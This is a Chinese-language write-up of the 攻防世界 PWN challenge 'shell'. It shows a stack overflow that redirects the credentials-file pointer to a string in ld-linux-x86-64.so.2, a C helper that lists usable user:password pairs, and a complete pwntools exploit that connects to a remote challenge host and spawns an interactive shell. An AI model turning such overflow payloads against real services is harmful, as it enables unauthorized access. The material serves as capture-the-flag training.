shell

首先,检查一下程序的保护机制

攻防世界PWN之shell题解

然后,我们用IDA分析

攻防世界PWN之shell题解

存在栈溢出漏洞

我们先运行程序,发现可以直接输命令

攻防世界PWN之shell题解

然而,其他命令都不可用,需要登录成功才能用

攻防世界PWN之shell题解

我们看看登录的逻辑

攻防世界PWN之shell题解

程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码

只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shell

攻防世界PWN之shell题解

攻防世界PWN之shell题解

Main函数里最外层是死循环,因此我们不能结束它,也就不能ROP

攻防世界PWN之shell题解

我们可以把filename指针覆盖成其他地方啊,查看一下文件中的字符串

攻防世界PWN之shell题解

这个可以用,我们就把filename指针指向这个字符串吧,这样,程序第二次循环就从/lib64/ld-linux-x86-64.so.2文件中读取,由于我们本地也用这个文件,我们可以找找里面的字符串有没有符合条件的

  1. #include <stdio.h>  
  2.   
  3. int main() {  
  4.     FILE *f = fopen("/lib64/ld-linux-x86-64.so.2","r");  
  5.     char *buf = NULL;  
  6.     size_t n;  
  7.     if (f == NULL) {  
  8.         printf("error\n");  
  9.     }  
  10.     while (getline(&buf,&n,f) != -1) {  
  11.         char* user = strtok(buf, ":");  
  12.         char* pwd = strtok(0LL, ":");  
  13.         printf("%s:%s\n",user,pwd);  
  14.     }  
  15.     fclose(f);  
  16.     return 0;  
  17. }  

我们发现,这些都可以使用

攻防世界PWN之shell题解

那么我们就随便选一组即可

综上,我们的exp脚本

  1. #coding:utf8  
  2. from pwn import *  
  3.   
  4. sh = remote('111.198.29.45',58711)  
  5.   
  6. #sh = process('./shell')  
  7. sh.sendline('login')  
  8. sh.sendlineafter('Username: ','sea')  
  9. #溢出栈覆盖filename,使得程序读取/lib64/ld-linux-x86-64.so.2文件中的内容  
  10. payload = 'a'*0x44 + p64(0x400200)  
  11. sh.sendlineafter('Password: ',payload)  
  12.   
  13. sh.sendlineafter('Authentication failed!','login')  
  14. sh.sendlineafter('Username: ','relocation processing')  
  15. sh.sendlineafter('Password: ',' %s%s')  
  16.   
  17. sh.sendlineafter('Authenticated!','sh')  
  18.   
  19.   
  20. sh.interactive()  

相关文章:

  • 2021-07-10
  • 2021-05-09
  • 2021-07-03
  • 2021-10-17
  • 2022-01-06
  • 2021-07-07
  • 2021-05-16
  • 2021-04-30
猜你喜欢
  • 2021-10-24
  • 2021-04-06
  • 2021-10-11
  • 2021-06-05
  • 2021-07-23
  • 2021-10-14
  • 2021-07-21
相关资源
相似解决方案